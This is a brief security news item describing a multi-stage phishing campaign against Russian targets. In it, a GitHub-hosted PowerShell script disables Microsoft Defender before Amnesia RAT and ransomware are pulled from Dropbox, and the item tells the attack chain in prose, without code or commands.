Multi-Stage Phishing Campaign Targets Russia with Amnesia RAT and Ransomware

Hackers are weaponizing GitHub and Dropbox to bypass defenses and drop Amnesia RAT + ransomware on Russian targets. This isn't your average phishing email — it's a surgical strike designed to disable Microsoft Defender before deploying the payload.

The campaign starts with a phishing email containing a malicious link. When clicked, it downloads a PowerShell script from GitHub that disables Microsoft Defender's real-time protection. Once defenses are down, the script pulls the Amnesia RAT from Dropbox and executes it.

Amnesia RAT gives attackers full remote access to compromised systems — think keylogging, screen capturing, file exfiltration, and command execution. But they didn't stop there. The same infrastructure deploys ransomware to encrypt files and demand payment, doubling the damage.

This attack chain shows how threat actors are evolving beyond simple malware attachments. By abusing legitimate services like GitHub and Dropbox, they're making detection harder and increasing the success rate of their campaigns.

Security researchers tracking this campaign note the sophisticated use of living-off-the-land techniques (LOLbins) and the clear targeting of Russian entities. The combination of remote access and ransomware suggests either data theft or disruptive intent — or both.